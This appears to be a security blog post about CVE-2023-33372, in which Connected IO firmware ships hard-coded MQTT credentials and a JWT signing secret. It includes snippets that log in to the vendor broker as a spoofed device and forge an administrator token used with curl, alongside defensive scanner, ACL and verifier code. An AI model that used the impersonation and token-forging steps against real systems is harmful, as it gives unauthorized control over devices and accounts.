In today’s world, Internet of Things (IoT) devices are used everywhere — from factories to smart homes. But a recent flaw, CVE-2023-33372, found in _Connected IO_ (up to v2.1.), shows how things can go seriously wrong when device firmware relies on hard-coded usernames and passwords for communication. Researchers discovered that anyone with access to the firmware could snatch these credentials, connect to the device’s MQTT broker, impersonate devices, and even forge authentication using JWT tokens.

This post will break down what happened, how it works, and why it matters — with code snippets, explanations, and reference links so you can see the details for yourself.

### What does this mean?

When a device has a username and password built into its firmware, anyone who can get a copy (say, via a firmware update download or extracting from the hardware) can read those secrets. Worse yet, if these are used to connect to central services — like an MQTT broker (a popular IoT messaging system) — that means attackers can pose as legitimate devices.

Here, the firmware didn’t just store hard-coded MQTT credentials. It also contained the secret key used to sign and verify JWT tokens (used for web sessions and API access). Anyone with these could bypass authentication.

### Step 1: Extracting the Credentials

The username/password pair and the JWT signing secret were stored directly in the firmware, in plaintext or behind only trivial obfuscation.

For example, a configuration file such as /etc/config.json (a representative layout, not the actual file):

```json
{
    "mqtt_user": "connectedio",
    "mqtt_pass": "SuperSecret123!",
    "jwt_secret": "MyVerySecretJWTKey!"
}
```
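The natural defensive counterpart to this step is an audit that walks an extracted firmware root filesystem and flags credentials baked into it. The following is an added example, not code from the original post or from Connected IO; the directory layout, file names and every secret value it writes are constructed for the demo, and the key-name patterns it looks for are an assumption you would widen for vendor-specific naming.

```python
"""Added example, not from the original post: audit an extracted firmware
root filesystem for hard-coded credentials.  Layout, file names and all
secret values below are constructed for the demo."""
import json
import os
import re
import tempfile

# Key names that usually hold secrets (assumption; widen for vendor naming).
# Usernames are deliberately not flagged, only the secret half of a credential.
SECRET_KEY_RE = re.compile(r"(pass(word|wd)?|secret|token|api[_-]?key|private[_-]?key)", re.I)

# key=value / key: value lines in shell, ini and similar plain-text configs.
KV_RE = re.compile(
    r"^\s*([A-Za-z0-9_.-]*(pass|secret|token|key)[A-Za-z0-9_.-]*)\s*[=:]\s*['\"]?([^'\"\s]+)",
    re.I,
)


def _walk_json(obj, path, rel, findings):
    """Recursively collect (file, dotted key path, value) for secret-looking keys."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            if isinstance(value, str) and value and SECRET_KEY_RE.search(key):
                findings.append((rel, path + key, value))
            else:
                _walk_json(value, path + key + ".", rel, findings)
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            _walk_json(value, f"{path}{index}.", rel, findings)


def scan_firmware(root):
    """Return a sorted list of (relative path, key, value) findings under `root`."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            try:
                with open(full, encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable special file; skip it
            parsed = None
            if name.endswith(".json"):
                try:
                    parsed = json.loads(text)
                except ValueError:
                    parsed = None  # not valid JSON; fall back to the text scan
            if parsed is not None:
                _walk_json(parsed, "", rel, findings)
                continue
            for line in text.splitlines():
                match = KV_RE.match(line)
                if match:
                    findings.append((rel, match.group(1), match.group(3)))
    return sorted(findings)


def build_sample_firmware():
    """Write a tiny constructed rootfs to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="fw-")
    os.makedirs(os.path.join(root, "etc", "init.d"))
    with open(os.path.join(root, "etc", "config.json"), "w") as fh:
        json.dump({
            "mqtt_user": "connectedio",
            "mqtt_pass": "example-mqtt-pass",      # constructed value
            "jwt_secret": "example-jwt-secret",    # constructed value
            "cloud": {"api_key": "example-api-key", "region": "eu"},
        }, fh)
    with open(os.path.join(root, "etc", "init.d", "mqtt.sh"), "w") as fh:
        fh.write('#!/bin/sh\nBROKER=broker.example.invalid\nMQTT_USER="device"\n'
                 'MQTT_PASS="example-shell-pass"\nLOG_LEVEL=info\n')
    return root


if __name__ == "__main__":
    for rel, key, value in scan_firmware(build_sample_firmware()):
        print(f"{rel}: {key} = {value!r}")
```

Run it against the output of a firmware unpacker (for example the squashfs root extracted with binwalk) instead of the constructed tree; any hit in a shipped image is, by definition, a secret shared by every unit in the field.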

### Step 2: Hijacking the MQTT Broker

MQTT (Message Queuing Telemetry Transport) is the protocol devices use to send and receive messages. With the discovered MQTT credentials, an attacker can connect as if they are a legitimate device, listen in, send fake commands, or impersonate others.

Here’s a Python snippet using the widely used Paho MQTT library:

```python
import paho.mqtt.client as mqtt

broker = "broker.connectedio.com"
port = 1883
username = "connectedio"          # credentials recovered from the firmware
password = "SuperSecret123!"

client = mqtt.Client(client_id="stolen_device_id")
client.username_pw_set(username, password)
client.connect(broker, port=port)

# Subscribe or publish as a legitimate device
client.publish("devices/123/status", "online")

client.disconnect()
```

Once connected, the attacker:

- Reads private device messages.
- Spoofs device data/commands.
- Triggers actions on the server ("turn on", "run update", etc.).
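The broker-side fix for this step is to stop one credential from standing for every device. The following is an added example, not code from the original post or from Connected IO's broker: each unit is provisioned with a random per-install password that the server keeps only as a salted PBKDF2 hash, the MQTT client id must match the authenticated username, and the topic ACL is derived from that identity, so a credential lifted from one unit cannot publish into another device's topics. The device ids, topic layout and ACL patterns are constructed assumptions.

```python
"""Added example, not from the original post: per-device credentials plus an
identity-bound topic ACL, as a broker authentication/authorization backend
would implement them.  Device ids, topic layout and ACL patterns are assumed."""
import hashlib
import hmac
import secrets

# Assumed topic policy: a device publishes its own status and telemetry and may
# only subscribe to its own command channel.
PUBLISH_ACL = ["devices/{id}/status", "devices/{id}/telemetry/#"]
SUBSCRIBE_ACL = ["devices/{id}/cmd/+"]


def topic_covered(pattern, requested):
    """True if every topic matched by `requested` is also matched by `pattern`.

    `requested` is an exact topic (publish) or a filter with MQTT wildcards
    (subscribe).  A wildcard in the request is only allowed where the ACL
    pattern is at least as broad, so "devices/+/cmd/x" is refused.
    """
    pat, req = pattern.split("/"), requested.split("/")
    for i, pseg in enumerate(pat):
        if pseg == "#":
            return True                 # '#' covers this level and everything below
        if i >= len(req) or req[i] == "#":
            return False                # request is shorter, or broader than the pattern
        if pseg == "+":
            continue                    # any single level, including a requested '+'
        if req[i] != pseg:
            return False                # literal mismatch (also catches a requested '+')
    return len(req) == len(pat)


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class DeviceBroker:
    def __init__(self):
        self._devices = {}  # device id -> (salt, pbkdf2 digest); no plaintext kept

    def provision(self, device_id):
        """Generate a unique password for one unit; returned once for delivery."""
        password = secrets.token_urlsafe(24)
        salt = secrets.token_bytes(16)
        self._devices[device_id] = (salt, _hash(password, salt))
        return password

    def authenticate(self, username, password):
        record = self._devices.get(username)
        if record is None:
            return False
        salt, digest = record
        return hmac.compare_digest(digest, _hash(password, salt))

    def authorize(self, username, client_id, action, topic):
        """ACL check for a publish or subscribe by an authenticated session."""
        if username not in self._devices or client_id != username:
            return False  # the client id must match the credential; no borrowed ids
        if action == "publish":
            patterns = PUBLISH_ACL
        elif action == "subscribe":
            patterns = SUBSCRIBE_ACL
        else:
            return False
        return any(topic_covered(p.format(id=username), topic) for p in patterns)


if __name__ == "__main__":
    broker = DeviceBroker()
    pw = broker.provision("123")
    print("login ok:", broker.authenticate("123", pw))
    print("own status:", broker.authorize("123", "123", "publish", "devices/123/status"))
    print("other device:", broker.authorize("123", "123", "publish", "devices/456/status"))
```

The same policy maps directly onto a production broker: Mosquitto's password file plus an ACL file with per-user topic patterns, or an auth plugin backed by a database, gives you the `authenticate` and `authorize` halves without custom code; the point is that no two units share a password and no unit's ACL reaches beyond its own topic tree.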

### Step 3: Forging JWT Tokens to Bypass Web/API Authentication

JWT (JSON Web Tokens) are used for session authentication. The server uses a secret key (found in the firmware as jwt_secret) to both sign and verify tokens.

With the secret key, attackers can create _arbitrary valid tokens_ — impersonating any user or device!

Example: Crafting a JWT

Install pyjwt:

```shell
pip install pyjwt
```

Create a fake admin JWT:

```python
import datetime
import jwt  # PyJWT

jwt_secret = "MyVerySecretJWTKey!"  # the signing secret recovered from the firmware

payload = {
    "user": "admin",
    "role": "administrator",
    # utcnow() is deprecated since Python 3.12; PyJWT accepts an aware UTC datetime
    "exp": datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(hours=1),
}

token = jwt.encode(payload, jwt_secret, algorithm="HS256")
print(token)
```

Use this token to call protected web endpoints, bypassing authentication entirely:

```shell
curl -H "Authorization: Bearer <token_here>" https://web.connectedio.com/api/admin
```

Total authentication bypass: All session and admin access can be forged.

Even those who "change their password" are stuck — since the root problem is the secret embedded in every device.
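What the server side should look like instead is a verifier in which no single secret can mint every kind of token. The following is an added example built on the Python standard library, not code from the original post or from Connected IO: keys are selected by the token's `kid` header, each device holds its own key and may only assert its own identity, and human or admin sessions are signed with a server-only key that is never shipped in firmware. The key ids, the claim names and the `device-` prefix policy are constructed assumptions.

```python
"""Added example, not from the original post: a stdlib JWT (HS256) verifier
with algorithm pinning, per-`kid` keys and an identity policy that keeps a
device key from signing an administrator session.  Key ids and claims are
constructed assumptions."""
import base64
import hashlib
import hmac
import json
import secrets
import time


def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(payload, key, kid, ttl=3600, alg="HS256"):
    """Mint a compact token under `kid`.  `alg` is a parameter only so the
    test can show an unsigned 'none' header being rejected by the verifier."""
    claims = dict(payload)
    claims.setdefault("exp", int(time.time()) + ttl)
    header = {"alg": alg, "typ": "JWT", "kid": kid}
    segments = [_b64url(json.dumps(part, separators=(",", ":")).encode())
                for part in (header, claims)]
    signing_input = ".".join(segments).encode()
    sig = hmac.new(key, signing_input, hashlib.sha256).digest() if alg == "HS256" else b""
    return ".".join(segments + [_b64url(sig)])


class TokenVerifier:
    def __init__(self, keys, now=time.time):
        self._keys = keys   # kid -> key bytes; a real service loads these from a secrets store
        self._now = now

    def verify(self, token):
        parts = token.split(".")
        if len(parts) != 3:
            raise ValueError("malformed token")
        header = json.loads(_b64url_decode(parts[0]))
        # Pin the algorithm before touching any key: 'none' and confusion headers fail here.
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            raise ValueError("algorithm not allowed")
        kid = header.get("kid")
        key = self._keys.get(kid)
        if key is None:
            raise ValueError("unknown key id")
        expected = hmac.new(key, f"{parts[0]}.{parts[1]}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(parts[2])):
            raise ValueError("bad signature")
        claims = json.loads(_b64url_decode(parts[1]))
        exp = claims.get("exp")
        if not isinstance(exp, (int, float)) or exp <= self._now():
            raise ValueError("token expired or missing exp")
        # Policy (assumed): a device key speaks only for that device and carries no
        # role claim, so a key extracted from one unit cannot mint an admin session.
        if kid.startswith("device-") and (claims.get("sub") != kid or "role" in claims):
            raise ValueError("device key cannot assert this identity")
        return claims

    def check(self, token):
        """Non-raising form: (True, claims) or (False, reason)."""
        try:
            return True, self.verify(token)
        except ValueError as err:
            return False, str(err)


def build_demo():
    """Constructed key set: two device keys and one server-only session key."""
    keys = {name: secrets.token_bytes(32) for name in ("device-123", "device-456", "web-sessions")}
    return keys, TokenVerifier(keys)


if __name__ == "__main__":
    keys, verifier = build_demo()
    good = issue_token({"sub": "device-123"}, keys["device-123"], "device-123")
    forged = issue_token({"sub": "admin", "role": "administrator"}, keys["device-123"], "device-123")
    print("device token:", verifier.check(good)[0])
    print("admin via device key:", verifier.check(forged))
```

Two design points carry the weight here: the algorithm is fixed by the verifier rather than read from the token, and the set of keys a verifier will accept is partitioned by purpose, so even a full firmware dump yields at most one device's key and nothing that can sign for a user. Rotating a compromised device key then means replacing one entry in the key map, not re-flashing every unit.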

### Mitigations

- Patch your devices: Contact Connected IO for updates beyond v2.1. that rotate and randomize credentials per install.

### References and Further Reading

- Official CVE Entry: CVE-2023-33372
- MQTT Security Best Practices (HiveMQ)
- JWT Attacks & How to Prevent Them (Auth)
- OWASP: Insecure Storage

### Final Words

This flaw is a textbook example of why hard-coded passwords and secrets must never be used in embedded systems. Firmware updates should ensure secrets are randomized and stored securely — and MQTT brokers must enforce strict access controls.

For anyone running _Connected IO_ devices: Check your version and update now. Leaving this vulnerability unpatched exposes your infrastructure to complete compromise.

### Timeline

Published on: 08/04/2023 18:15:00 UTC
Last modified on: 08/08/2023 19:54:00 UTC